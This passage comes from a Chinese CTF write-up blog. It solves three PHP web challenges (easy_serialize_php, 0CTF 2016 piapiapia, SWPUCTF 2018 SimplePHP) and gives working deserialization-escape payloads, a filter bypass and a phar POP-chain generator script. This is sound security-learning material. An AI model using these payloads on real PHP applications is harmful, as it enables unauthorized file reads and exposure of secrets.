if(!$_GET[&#39;img_path&#39;])&#123;
  $_SESSION[&#39;img&#39;] &#x3D; base64_encode(&#39;guest_img.png&#39;);
&#125;else&#123;
  $_SESSION[&#39;img&#39;] &#x3D; sha1(base64_encode($_GET[&#39;img_path&#39;]));
&#125;

$serialize_info &#x3D; filter(serialize($_SESSION));

if($function &#x3D;&#x3D; &#39;highlight_file&#39;)&#123;
  highlight_file(&#39;index.php&#39;);
&#125;else if($function &#x3D;&#x3D; &#39;phpinfo&#39;)&#123;
  eval(&#39;phpinfo();&#39;); &#x2F;&#x2F;maybe you can find something in here!
&#125;else if($function &#x3D;&#x3D; &#39;show_image&#39;)&#123;
  $userinfo &#x3D; unserialize($serialize_info);
  echo file_get_contents(base64_decode($userinfo[&#39;img&#39;]));
  &#125;</code></pre>

<p>phpinfo里有东西，可以先看看</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210812234826151.png" alt="image-20210812234826151"></p>
<p>接下来我们应该开始想怎么让</p>
<p>base64_decode($userinfo[&#39;img&#39;])的值等于flag的文件名</p>
<p><strong>知识点</strong></p>
<ul>
<li>反序列化中的对象逃逸</li>
<li>extract()变量覆盖</li>
</ul>
<p><strong>extract()变量覆盖</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813004733910.png" alt="image-20210813004733910"></p>
<p>但是这里我们不能直接给img赋值，因为img赋值发生在extract之后</p>
<p><strong>反序列化中的对象逃逸</strong></p>
<p><strong>键值逃逸</strong></p>
<ul>
<li>因为序列化的字符串是严格的，对应的格式不能错，比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。</li>
<li>并且反序列化会把多余的字符串当垃圾处理，在花括号内的就是正确的，花括号<code>&#123;&#125;</code>外的就都被扔掉。</li>
</ul>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813005203142.png" alt="image-20210813005203142"></p>
<p>接下来是构造payload的部分</p>
<p>首先我们需要构造img属性：</p>
<p>s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA==&quot;; </p>
<p>其中的ZDBnM19mMWFnLnBocA==是d0g3_f1ag.php的base64加密的结果然后在这个属性前面随便加上个序列化字符串（只要是合法的就行），比如：</p>
<p>;s:1:“1”;<br>;s:2:“10”;<br>;s:3:“100”;</p>
<p>所以payload可以为：</p>
<pre class="language-php" data-language="php"><code class="language-php">_SESSION[phpflag]&#x3D;;s:1:&quot;1&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;</code></pre>

<p>session中存在phpflag的原因是由于filter函数会将匹配到的值变为空，而phpflag的长度刚好为7</p>
<p><strong>为7的原因</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813010634981.png" alt="image-20210813010634981"></p>
<p>但是添加了filter函数来进行过滤之后</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813010753030.png" alt="image-20210813010753030"></p>
<p>原来的内容变为了</p>
<pre class="language-none"><code class="language-none">a:1:&#123;s:7:&quot;&quot;;s:48:&quot;;s:1:&quot;1&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;</code></pre>

<p>能成功实现读取flag所在文件的命令</p>
<p>post后</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813011013959.png" alt="image-20210813011013959"></p>
<p>对/d0g3_fllllllag进行base64编码后为L2QwZzNfZmxsbGxsbGFn</p>
<p>所以直接把原来的编码替换掉就行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210813011156367.png" alt="image-20210813011156367"></p>
<p>看是看懂了，但我还是想不到这种payload。。。</p>
<p>参考文章</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44632787/article/details/119185112?utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-1.baidujsUnder6&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-1.baidujsUnder6">安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计_若丶时光破灭的博客-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/h3zh1/p/12732336.html">https://www.cnblogs.com/h3zh1/p/12732336.html</a></p>
<h2 id="0CTF-2016-piapiapia"><a href="#0CTF-2016-piapiapia" class="headerlink" title="[0CTF 2016]piapiapia"></a>[0CTF 2016]piapiapia</h2><p>进入后是个登录页面，本来以为是sql注入，试了一下发现没能成功，扫目录扫到<a target="_blank" rel="noopener" href="http://www.zip备份文件/">www.zip备份文件</a></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163607732.png" alt="image-20210903163607732"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903132345413.png" alt="image-20210903132345413"></p>
<p>访问一下register.php注册个账户就可以登录了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163626344.png" alt="image-20210903163626344"></p>
<p>再看其他的内容</p>
<p>profile.php</p>
<pre class="language-none"><code class="language-none">&lt;?php
   require_once(&#39;class.php&#39;);
   if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;
      die(&#39;Login First&#39;);    
   &#125;
   $username &#x3D; $_SESSION[&#39;username&#39;];
   $profile&#x3D;$user-&gt;show_profile($username);
   if($profile  &#x3D;&#x3D; null) &#123;
      header(&#39;Location: update.php&#39;);
   &#125;
   else &#123;
      $profile &#x3D; unserialize($profile);
      $phone &#x3D; $profile[&#39;phone&#39;];
      $email &#x3D; $profile[&#39;email&#39;];
      $nickname &#x3D; $profile[&#39;nickname&#39;];
      $photo &#x3D; base64_encode(file_get_contents($profile[&#39;photo&#39;]));
?&gt;</code></pre>

<p>class.php</p>
<pre class="language-none"><code class="language-none">&lt;?php
require(&#39;config.php&#39;);

class user extends mysql&#123;
   private $table &#x3D; &#39;users&#39;;

   public function is_exists($username) &#123;
      $username &#x3D; parent::filter($username);

      $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;
      return parent::select($this-&gt;table, $where);
   &#125;
   public function register($username, $password) &#123;
      $username &#x3D; parent::filter($username);
      $password &#x3D; parent::filter($password);

      $key_list &#x3D; Array(&#39;username&#39;, &#39;password&#39;);
      $value_list &#x3D; Array($username, md5($password));
      return parent::insert($this-&gt;table, $key_list, $value_list);
   &#125;
   public function login($username, $password) &#123;
      $username &#x3D; parent::filter($username);
      $password &#x3D; parent::filter($password);

      $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;
      $object &#x3D; parent::select($this-&gt;table, $where);
      if ($object &amp;&amp; $object-&gt;password &#x3D;&#x3D;&#x3D; md5($password)) &#123;
         return true;
      &#125; else &#123;
         return false;
      &#125;
   &#125;
   public function show_profile($username) &#123;
      $username &#x3D; parent::filter($username);

      $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;
      $object &#x3D; parent::select($this-&gt;table, $where);
      return $object-&gt;profile;
   &#125;
   public function update_profile($username, $new_profile) &#123;
      $username &#x3D; parent::filter($username);
      $new_profile &#x3D; parent::filter($new_profile);

      $where &#x3D; &quot;username &#x3D; &#39;$username&#39;&quot;;
      return parent::update($this-&gt;table, &#39;profile&#39;, $new_profile, $where);
   &#125;
   public function __tostring() &#123;
      return __class__;
   &#125;
&#125;

class mysql &#123;
   private $link &#x3D; null;

   public function connect($config) &#123;
      $this-&gt;link &#x3D; mysql_connect(
         $config[&#39;hostname&#39;],
         $config[&#39;username&#39;], 
         $config[&#39;password&#39;]
      );
      mysql_select_db($config[&#39;database&#39;]);
      mysql_query(&quot;SET sql_mode&#x3D;&#39;strict_all_tables&#39;&quot;);

      return $this-&gt;link;
   &#125;

   public function select($table, $where, $ret &#x3D; &#39;*&#39;) &#123;
      $sql &#x3D; &quot;SELECT $ret FROM $table WHERE $where&quot;;
      $result &#x3D; mysql_query($sql, $this-&gt;link);
      return mysql_fetch_object($result);
   &#125;

   public function insert($table, $key_list, $value_list) &#123;
      $key &#x3D; implode(&#39;,&#39;, $key_list);
      $value &#x3D; &#39;\&#39;&#39; . implode(&#39;\&#39;,\&#39;&#39;, $value_list) . &#39;\&#39;&#39;; 
      $sql &#x3D; &quot;INSERT INTO $table ($key) VALUES ($value)&quot;;
      return mysql_query($sql);
   &#125;

   public function update($table, $key, $value, $where) &#123;
      $sql &#x3D; &quot;UPDATE $table SET $key &#x3D; &#39;$value&#39; WHERE $where&quot;;
      return mysql_query($sql);
   &#125;

   public function filter($string) &#123;
      $escape &#x3D; array(&#39;\&#39;&#39;, &#39;\\\\&#39;);
      $escape &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $escape) . &#39;&#x2F;&#39;;
      $string &#x3D; preg_replace($escape, &#39;_&#39;, $string);

      $safe &#x3D; array(&#39;select&#39;, &#39;insert&#39;, &#39;update&#39;, &#39;delete&#39;, &#39;where&#39;);
      $safe &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $safe) . &#39;&#x2F;i&#39;;
      return preg_replace($safe, &#39;hacker&#39;, $string);
   &#125;
   public function __tostring() &#123;
      return __class__;
   &#125;
&#125;
session_start();
$user &#x3D; new user();
$user-&gt;connect($config);</code></pre>

<p>update.php</p>
<pre class="language-none"><code class="language-none">&lt;?php
   require_once(&#39;class.php&#39;);
   if($_SESSION[&#39;username&#39;] &#x3D;&#x3D; null) &#123;
      die(&#39;Login First&#39;);    
   &#125;
   if($_POST[&#39;phone&#39;] &amp;&amp; $_POST[&#39;email&#39;] &amp;&amp; $_POST[&#39;nickname&#39;] &amp;&amp; $_FILES[&#39;photo&#39;]) &#123;

      $username &#x3D; $_SESSION[&#39;username&#39;];
      if(!preg_match(&#39;&#x2F;^\d&#123;11&#125;$&#x2F;&#39;, $_POST[&#39;phone&#39;]))
         die(&#39;Invalid phone&#39;);

      if(!preg_match(&#39;&#x2F;^[_a-zA-Z0-9]&#123;1,10&#125;@[_a-zA-Z0-9]&#123;1,10&#125;\.[_a-zA-Z0-9]&#123;1,10&#125;$&#x2F;&#39;, $_POST[&#39;email&#39;]))
         die(&#39;Invalid email&#39;);
      
      if(preg_match(&#39;&#x2F;[^a-zA-Z0-9_]&#x2F;&#39;, $_POST[&#39;nickname&#39;]) || strlen($_POST[&#39;nickname&#39;]) &gt; 10)
         die(&#39;Invalid nickname&#39;);

      $file &#x3D; $_FILES[&#39;photo&#39;];
      if($file[&#39;size&#39;] &lt; 5 or $file[&#39;size&#39;] &gt; 1000000)
         die(&#39;Photo size error&#39;);

      move_uploaded_file($file[&#39;tmp_name&#39;], &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]));
      $profile[&#39;phone&#39;] &#x3D; $_POST[&#39;phone&#39;];
      $profile[&#39;email&#39;] &#x3D; $_POST[&#39;email&#39;];
      $profile[&#39;nickname&#39;] &#x3D; $_POST[&#39;nickname&#39;];
      $profile[&#39;photo&#39;] &#x3D; &#39;upload&#x2F;&#39; . md5($file[&#39;name&#39;]);

      $user-&gt;update_profile($username, serialize($profile));
      echo &#39;Update Profile Success!&lt;a href&#x3D;&quot;profile.php&quot;&gt;Your Profile&lt;&#x2F;a&gt;&#39;;
   &#125;
   else &#123;
?&gt;</code></pre>

<p>config.php</p>
<pre class="language-none"><code class="language-none">&lt;?php
   $config[&#39;hostname&#39;] &#x3D; &#39;127.0.0.1&#39;;
   $config[&#39;username&#39;] &#x3D; &#39;root&#39;;
   $config[&#39;password&#39;] &#x3D; &#39;&#39;;
   $config[&#39;database&#39;] &#x3D; &#39;&#39;;
   $flag &#x3D; &#39;&#39;;
?&gt;</code></pre>

<p>profile里有个file_get_content函数可能有文件读取漏洞，而flag在config.php中，就要让photo=config.php，这里可以利用前边的$profile = unserialize($profile);</p>
<p>所以再根据</p>
<pre class="language-none"><code class="language-none">$safe &#x3D; array(&#39;select&#39;, &#39;insert&#39;, &#39;update&#39;, &#39;delete&#39;, &#39;where&#39;);
     $safe &#x3D; &#39;&#x2F;&#39; . implode(&#39;|&#39;, $safe) . &#39;&#x2F;i&#39;;
     return preg_replace($safe, &#39;hacker&#39;, $string);
  &#125;</code></pre>

<p>可以进行反序列化字符逃逸</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903162948758.png" alt="image-20210903162948758"></p>
<pre class="language-none"><code class="language-none">wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere&quot;;s:5:&quot;photo&quot;;s:10:&quot;config.php&quot;;&#125;</code></pre>

<p>这里这个过滤可以利用抓包将nickename改成数组类型来绕过</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163055572.png" alt="image-20210903163055572"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20220516175618670.png" alt="image-20220516175618670"></p>
<p>看一下这个your profile页面</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163211494.png" alt="image-20210903163211494"></p>
<p>看一下这个图片的源码，是个base64加密的内容，进行解密后可以得到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163313640.png" alt="image-20210903163313640"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20210903163322131.png" alt="image-20210903163322131"></p>
<h2 id="SWPUCTF-2018-SimplePHP"><a href="#SWPUCTF-2018-SimplePHP" class="headerlink" title="[SWPUCTF 2018]SimplePHP"></a>[SWPUCTF 2018]SimplePHP</h2><p>文件上传，但是这个flie参数感觉可以直接文件读取</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20211125203202419.png" alt="image-20211125203202419"></p>
<p>index.php</p>
<pre class="language-none"><code class="language-none">&lt;?php 
header(&quot;content-type:text&#x2F;html;charset&#x3D;utf-8&quot;);  
include &#39;base.php&#39;;
?&gt; </code></pre>

<p>base.php</p>
<pre class="language-none"><code class="language-none">&lt;?php 
    session_start(); 
?&gt; 
&lt;!DOCTYPE html&gt; 
&lt;html&gt; 
&lt;head&gt; 
    &lt;meta charset&#x3D;&quot;utf-8&quot;&gt; 
    &lt;title&gt;web3&lt;&#x2F;title&gt; 
    &lt;link rel&#x3D;&quot;stylesheet&quot; href&#x3D;&quot;https:&#x2F;&#x2F;cdn.staticfile.org&#x2F;twitter-bootstrap&#x2F;3.3.7&#x2F;css&#x2F;bootstrap.min.css&quot;&gt; 
    &lt;script src&#x3D;&quot;https:&#x2F;&#x2F;cdn.staticfile.org&#x2F;jquery&#x2F;2.1.1&#x2F;jquery.min.js&quot;&gt;&lt;&#x2F;script&gt; 
    &lt;script src&#x3D;&quot;https:&#x2F;&#x2F;cdn.staticfile.org&#x2F;twitter-bootstrap&#x2F;3.3.7&#x2F;js&#x2F;bootstrap.min.js&quot;&gt;&lt;&#x2F;script&gt; 
&lt;&#x2F;head&gt; 
&lt;body&gt; 
    &lt;nav class&#x3D;&quot;navbar navbar-default&quot; role&#x3D;&quot;navigation&quot;&gt; 
        &lt;div class&#x3D;&quot;container-fluid&quot;&gt; 
        &lt;div class&#x3D;&quot;navbar-header&quot;&gt; 
            &lt;a class&#x3D;&quot;navbar-brand&quot; href&#x3D;&quot;index.php&quot;&gt;首页&lt;&#x2F;a&gt; 
        &lt;&#x2F;div&gt; 
            &lt;ul class&#x3D;&quot;nav navbar-nav navbra-toggle&quot;&gt; 
                &lt;li class&#x3D;&quot;active&quot;&gt;&lt;a href&#x3D;&quot;file.php?file&#x3D;&quot;&gt;查看文件&lt;&#x2F;a&gt;&lt;&#x2F;li&gt; 
                &lt;li&gt;&lt;a href&#x3D;&quot;upload_file.php&quot;&gt;上传文件&lt;&#x2F;a&gt;&lt;&#x2F;li&gt; 
            &lt;&#x2F;ul&gt; 
            &lt;ul class&#x3D;&quot;nav navbar-nav navbar-right&quot;&gt; 
                &lt;li&gt;&lt;a href&#x3D;&quot;index.php&quot;&gt;&lt;span class&#x3D;&quot;glyphicon glyphicon-user&quot;&gt;&lt;&#x2F;span&gt;&lt;?php echo $_SERVER[&#39;REMOTE_ADDR&#39;];?&gt;&lt;&#x2F;a&gt;&lt;&#x2F;li&gt; 
            &lt;&#x2F;ul&gt; 
        &lt;&#x2F;div&gt; 
    &lt;&#x2F;nav&gt; 
&lt;&#x2F;body&gt; 
&lt;&#x2F;html&gt; 
&lt;!--flag is in f1ag.php--&gt;</code></pre>

<p>file.php</p>
<pre class="language-none"><code class="language-none">&lt;?php 
header(&quot;content-type:text&#x2F;html;charset&#x3D;utf-8&quot;);  
include &#39;function.php&#39;; 
include &#39;class.php&#39;; 
ini_set(&#39;open_basedir&#39;,&#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;&#39;); 
$file &#x3D; $_GET[&quot;file&quot;] ? $_GET[&#39;file&#39;] : &quot;&quot;; 
if(empty($file)) &#123; 
    echo &quot;&lt;h2&gt;There is no file to show!&lt;h2&#x2F;&gt;&quot;; 
&#125; 
$show &#x3D; new Show(); 
if(file_exists($file)) &#123; 
    $show-&gt;source &#x3D; $file; 
    $show-&gt;_show(); 
&#125; else if (!empty($file))&#123; 
    die(&#39;file doesn\&#39;t exists.&#39;); 
&#125; 
?&gt; </code></pre>

<p>upload_file.php</p>
<pre class="language-none"><code class="language-none">&lt;?php 
include &#39;function.php&#39;; 
upload_file(); 
?&gt; 
&lt;html&gt; 
&lt;head&gt; 
&lt;meta charest&#x3D;&quot;utf-8&quot;&gt; 
&lt;title&gt;文件上传&lt;&#x2F;title&gt; 
&lt;&#x2F;head&gt; 
&lt;body&gt; 
&lt;div align &#x3D; &quot;center&quot;&gt; 
        &lt;h1&gt;前端写得很low,请各位师傅见谅!&lt;&#x2F;h1&gt; 
&lt;&#x2F;div&gt; 
&lt;style&gt; 
    p&#123; margin:0 auto&#125; 
&lt;&#x2F;style&gt; 
&lt;div&gt; 
&lt;form action&#x3D;&quot;upload_file.php&quot; method&#x3D;&quot;post&quot; enctype&#x3D;&quot;multipart&#x2F;form-data&quot;&gt; 
    &lt;label for&#x3D;&quot;file&quot;&gt;文件名:&lt;&#x2F;label&gt; 
    &lt;input type&#x3D;&quot;file&quot; name&#x3D;&quot;file&quot; id&#x3D;&quot;file&quot;&gt;&lt;br&gt; 
    &lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;submit&quot; value&#x3D;&quot;提交&quot;&gt; 
&lt;&#x2F;div&gt; 

&lt;&#x2F;script&gt; 
&lt;&#x2F;body&gt; 
&lt;&#x2F;html&gt;</code></pre>

<p>class.php</p>
<pre class="language-none"><code class="language-none">&lt;?php 
&#x2F;&#x2F;show_source(__FILE__); 
include &quot;base.php&quot;; 
header(&quot;Content-type: text&#x2F;html;charset&#x3D;utf-8&quot;); 
error_reporting(0); 
function upload_file_do() &#123; 
    global $_FILES; 
    $filename &#x3D; md5($_FILES[&quot;file&quot;][&quot;name&quot;].$_SERVER[&quot;REMOTE_ADDR&quot;]).&quot;.jpg&quot;; 
    &#x2F;&#x2F;mkdir(&quot;upload&quot;,0777); 
    if(file_exists(&quot;upload&#x2F;&quot; . $filename)) &#123; 
        unlink($filename); 
    &#125; 
    move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;],&quot;upload&#x2F;&quot; . $filename); 
    echo &#39;&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;alert(&quot;上传成功!&quot;);&lt;&#x2F;script&gt;&#39;; 
&#125; 
function upload_file() &#123; 
    global $_FILES; 
    if(upload_file_check()) &#123; 
        upload_file_do(); 
    &#125; 
&#125; 
function upload_file_check() &#123; 
    global $_FILES; 
    $allowed_types &#x3D; array(&quot;gif&quot;,&quot;jpeg&quot;,&quot;jpg&quot;,&quot;png&quot;); 
    $temp &#x3D; explode(&quot;.&quot;,$_FILES[&quot;file&quot;][&quot;name&quot;]); 
    $extension &#x3D; end($temp); 
    if(empty($extension)) &#123; 
        &#x2F;&#x2F;echo &quot;&lt;h4&gt;请选择上传的文件:&quot; . &quot;&lt;h4&#x2F;&gt;&quot;; 
    &#125; 
    else&#123; 
        if(in_array($extension,$allowed_types)) &#123; 
            return true; 
        &#125; 
        else &#123; 
            echo &#39;&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;alert(&quot;Invalid file!&quot;);&lt;&#x2F;script&gt;&#39;; 
            return false; 
        &#125; 
    &#125; 
&#125; 
?&gt; </code></pre>

<p>class.php</p>
<pre class="language-none"><code class="language-none">&lt;?php
class C1e4r
&#123;
    public $test;
    public $str;
    public function __construct($name)
    &#123;
        $this-&gt;str &#x3D; $name;
    &#125;
    public function __destruct()
    &#123;
        $this-&gt;test &#x3D; $this-&gt;str;
        echo $this-&gt;test;
    &#125;
&#125;

class Show
&#123;
    public $source;
    public $str;
    public function __construct($file)
    &#123;
        $this-&gt;source &#x3D; $file;   &#x2F;&#x2F;$this-&gt;source &#x3D; phar:&#x2F;&#x2F;phar.jpg
        echo $this-&gt;source;
    &#125;
    public function __toString()
    &#123;
        $content &#x3D; $this-&gt;str[&#39;str&#39;]-&gt;source;
        return $content;
    &#125;
    public function __set($key,$value)
    &#123;
        $this-&gt;$key &#x3D; $value;
    &#125;
    public function _show()
    &#123;
        if(preg_match(&#39;&#x2F;http|https|file:|gopher|dict|\.\.|f1ag&#x2F;i&#39;,$this-&gt;source)) &#123;
            die(&#39;hacker!&#39;);
        &#125; else &#123;
            highlight_file($this-&gt;source);
        &#125;
        
    &#125;
    public function __wakeup()
    &#123;
        if(preg_match(&quot;&#x2F;http|https|file:|gopher|dict|\.\.&#x2F;i&quot;, $this-&gt;source)) &#123;
            echo &quot;hacker~&quot;;
            $this-&gt;source &#x3D; &quot;index.php&quot;;
        &#125;
    &#125;
&#125;
class Test
&#123;
    public $file;
    public $params;
    public function __construct()
    &#123;
        $this-&gt;params &#x3D; array();
    &#125;
    public function __get($key)
    &#123;
        return $this-&gt;get($key);
    &#125;
    public function get($key)
    &#123;
        if(isset($this-&gt;params[$key])) &#123;
            $value &#x3D; $this-&gt;params[$key];
        &#125; else &#123;
            $value &#x3D; &quot;index.php&quot;;
        &#125;
        return $this-&gt;file_get($value);
    &#125;
    public function file_get($value)
    &#123;
        $text &#x3D; base64_encode(file_get_contents($value));
        return $text;
    &#125;
&#125;
?&gt;</code></pre>

<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20211125204709437.png" alt="image-20211125204709437"></p>
<p>肯定是用这个函数来读取flag文件，但是没有反序列化的地方</p>
<p>加个新知识</p>
<p><strong>利用phar协议实现反序列化漏洞攻击</strong></p>
<p><strong>漏洞成因</strong> </p>
<p>phar文件会以序列化的形式存储用户自定义的meta-data；该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下，配合phar://伪协议，可以不依赖unserialize()直接进行反序列化操作</p>
<p>原理分析 </p>
<p>phar的组成</p>
<p>通过查阅手册发现phar由四部分组成；翻阅手册可以知道，phar由四个部分组成，分别是<code>stub、manifest describing the contents、 the file contents、 [optional] a signature for verifying Phar integrity (phar file format only)</code> 下面进行解释一下；</p>
<p>1 .0  a stub</p>
<p>标识作用，格式为</p>
<pre class="language-none"><code class="language-none">xxx&lt;?php xxx; __HALT_COMPILER();?&gt;</code></pre>

<p>，前面任意，但是一定要以__HALT_COMPILER();?&gt;结尾，否则php无法识别这是一个phar文件；</p>
<p>2 .0 </p>
<p>a manifest describing the contents</p>
<p>其实可以理解为phar文件本质上是一中压缩文件，其中包含有压缩信息和权限，当然我们需要利用的序列化也在里面；</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/425be1b3b3df9e7799bbae0ade22b5ac-16378452560562.png" alt="425be1b3b3df9e7799bbae0ade22b5ac.png"></p>
<p>3 .0 the file contents</p>
<p>这里指的是被压缩文件的内容；</p>
<p>4 .0 [optional] a signature for verifying Phar integrity (phar file format only)</p>
<p>签名，放在结尾；</p>
<p><strong>C1e4r类中有__destruct(),</strong></p>
<p>__destruct()是PHP中的析构方法，在对象被销毁时被调用，程序结束时会被自动调用销毁对象。</p>
<p>函数中发现了echo，那么要利用echo $this-&gt;test。</p>
<p><strong>show类有__toString(),</strong></p>
<p>__toString方法在将一个对象转化成字符串时被自动调用，比如进行echo，print操作时会被调用并返回一个字符串。</p>
<p>利用$this-&gt;str[&#39;str&#39;]-&gt;source;</p>
<p><strong>Test类有__get（）</strong></p>
<p>__get（）当未定义的属性或没有权限访问的属性被访问时该方法会被调用。</p>
<p>利用 $this-&gt;get --&gt; $this-&gt;file_get($value); --&gt;base64_encode(file_get_contents($value));</p>
<p>利用C1e4r类的<code>__destruct()</code>中的echo this-&gt;test<br>2.触发Show类的<code>__toString()</code><br>3.利用Show类的<code>this-&gt;test2.触发Show类的</code>__toString()<code>3.利用Show类的</code>content = $this-&gt;str[&#39;str&#39;]-&gt;source<code>4.触发Test类的</code>__get()<code>5.成功利用</code>file_get()`读文件</p>
<p>反序列化结果</p>
<pre class="language-none"><code class="language-none">&lt;?php
class C1e4r
&#123;
    public $test;
    public $str;
&#125;

class Show
&#123;
    public $source;
    public $str;
&#125;
class Test
&#123;
    public $file;
    public $params;
&#125;
$a &#x3D; new C1e4r();
$b &#x3D; new Show();
$c &#x3D; new Test();
$a -&gt;str &#x3D; $b;
$b -&gt;str[&#39;str&#39;] &#x3D; $c;
$c -&gt;params[&#39;source&#39;] &#x3D; &#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;f1ag.php&#39;;


$phar &#x3D; new Phar(&quot;exp.phar&quot;); &#x2F;&#x2F;.phar文件
$phar-&gt;startBuffering();
$phar-&gt;setStub(&#39;&lt;?php __HALT_COMPILER(); ? &gt;&#39;); &#x2F;&#x2F;固定的
$phar-&gt;setMetadata($a); &#x2F;&#x2F;触发的头是C1e4r类，所以传入C1e4r对象
$phar-&gt;addFromString(&quot;exp.txt&quot;, &quot;test&quot;); &#x2F;&#x2F;随便写点什么生成个签名
$phar-&gt;stopBuffering();

?&gt;
</code></pre>

<p>生成phar文件后，改个后缀上传就行，phar的文件不管什么后缀都会直接执行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20211125235333537.png" alt="image-20211125235333537"></p>
<p>看上传的文件（也可以根据源码推文件名，然后利用phar://协议访问</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20211125235401120.png" alt="image-20211125235401120"></p>
<p>得到flag</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/buu%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95(%E4%BA%8C)/image-20211125235433599.png" alt="image-20211125235433599"></p>
<p>小tips：如果phar协议被过滤，可以试试用</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">compress.bzip2:&#x2F;&#x2F;phar:&#x2F;&#x2F;    版本：7.4 +
compress.zlib:&#x2F;&#x2F;phar:&#x2F;&#x2F;&#x2F;    版本：都可以
php:&#x2F;&#x2F;filter&#x2F;resource&#x3D;phar:&#x2F;&#x2F;</code></pre>

<h2 id><a href="#" class="headerlink" title></a></h2>
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Ethe</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
